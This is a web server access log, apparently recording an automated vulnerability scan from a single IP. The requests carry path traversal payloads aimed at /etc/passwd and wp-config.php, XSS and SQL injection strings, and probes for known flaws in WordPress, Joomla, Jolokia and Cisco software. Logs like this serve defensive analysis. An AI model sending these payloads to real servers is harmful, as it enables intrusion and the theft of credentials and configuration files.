195.164.49.69 - - [18/Nov/2024:23:56:02 +0000] GET /install/ HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:56:04 +0000] GET /status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:23:56:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:56:08 +0000] GET /images/../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:56:10 +0000] GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
- - - [18/Nov/2024:23:56:12 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:56:16 +0000] GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:56:17 +0000] GET /storage/logs/laravel.log HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:56:19 +0000] GET /data/plugins_listing HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:56:21 +0000] GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:56:23 +0000] OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:23:56:25 +0000] GET /css_parser.php?css=css_parser.php HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:56:26 +0000] GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:56:28 +0000] GET /wp-json/wp/v2/lesson/1 HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:56:30 +0000] GET /components/statestore HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:56:34 +0000] GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:56:36 +0000] GET /defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:56:38 +0000] GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:56:40 +0000] GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:56:42 +0000] GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:56:44 +0000] GET /api/snapshots/:key HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:56:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:56:47 +0000] GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:23:56:49 +0000] GET /plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:23:56:51 +0000] GET /index/ajax/lang?lang=..//..//application/database HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:56:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:56:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:56:57 +0000] GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:56:59 +0000] GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:57:00 +0000] GET /wp-admin/setup-config.php?step=1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:57:02 +0000] OPTIONS /*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:23:57:04 +0000] GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1169
195.164.49.69 - - [18/Nov/2024:23:57:06 +0000] GET /admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:57:08 +0000] GET /ui/login/register HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:57:10 +0000] GET /sftp-config.json HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:57:11 +0000] GET /jkstatus HTTP/1.1 404 1082
- - - [18/Nov/2024:23:57:13 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:57:15 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:57:17 +0000] GET /overview HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:57:19 +0000] GET /usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:57:21 +0000] GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:57:23 +0000] GET /jolokia/list HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:57:25 +0000] GET /?c=../../../../../../etc/passwd%00 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:57:26 +0000] GET /wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1 HTTP/1.1 404 1146
195.164.49.69 - - [18/Nov/2024:23:57:28 +0000] GET /chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:57:30 +0000] GET /Default.aspx HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:57:32 +0000] GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1 404 1188
195.164.49.69 - - [18/Nov/2024:23:57:34 +0000] GET /admin_dev.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:57:35 +0000] GET /index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/ HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:57:38 +0000] GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1 404 1094
83.212.98.101 - - [18/Nov/2024:23:57:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:57:40 +0000] GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:57:42 +0000] GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1 404 1215
195.164.49.69 - - [18/Nov/2024:23:57:43 +0000] GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:57:45 +0000] GET /parameters.yml HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:57:47 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:57:49 +0000] GET /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5(2040768073))%23 HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:57:51 +0000] GET /jkstatus; HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:57:53 +0000] GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:57:55 +0000] GET /controlplane HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:57:56 +0000] GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:57:58 +0000] GET /.drone.yml HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:58:00 +0000] GET /actuator/jolokia/list HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:58:02 +0000] GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:58:04 +0000] GET /wp-content/dup-installer/main.installer.php?is_daws=1 HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:58:06 +0000] GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:58:07 +0000] GET /admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:58:09 +0000] GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1 404 1201
195.164.49.69 - - [18/Nov/2024:23:58:11 +0000] GET /install.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:58:13 +0000] GET /index_dev.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:58:15 +0000] GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:23:58:17 +0000] GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:23:58:20 +0000] GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:58:22 +0000] GET /SSI/Auth/ip_snmp.htm HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:58:25 +0000] GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:58:26 +0000] GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:58:28 +0000] GET /app/config/parameters.yml HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:58:30 +0000] GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:58:32 +0000] GET /auth.json HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:58:34 +0000] GET /../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:58:36 +0000] GET /wp-content/backups-dup-lite/tmp/ HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:58:38 +0000] GET /installed_emanual_down.html?path=/manual/../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:58:39 +0000] GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1 404 1167
195.164.49.69 - - [18/Nov/2024:23:58:41 +0000] GET /app_dev.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:58:43 +0000] GET /parameters.yml.dist HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:58:45 +0000] GET /wp-content/backups-dup-pro/tmp/ HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:23:58:47 +0000] GET /app/config/parameters.yml.dist HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:59:02 +0000] GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:23:59:06 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=https%3A%2F%2fsdc.iopan.pl:443%2Fadmin%2Fmaster%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge=wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:23:59:10 +0000] GET /rest/api/latest/repos HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:59:12 +0000] GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:23:59:16 +0000] GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:59:18 +0000] POST /templates/default/html/windows/right.php HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:23:59:20 +0000] POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:59:22 +0000] POST /api/v2/open/rowsInfo HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:59:24 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:59:27 +0000] GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:59:29 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:59:31 +0000] POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:59:33 +0000] GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:23:59:35 +0000] GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:59:37 +0000] POST /openam/json/realms/root/authenticate HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:59:41 +0000] POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:59:44 +0000] POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:59:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:59:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:59:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:59:57 +0000] POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:23:59:58 +0000] GET / HTTP/1.1 200 11204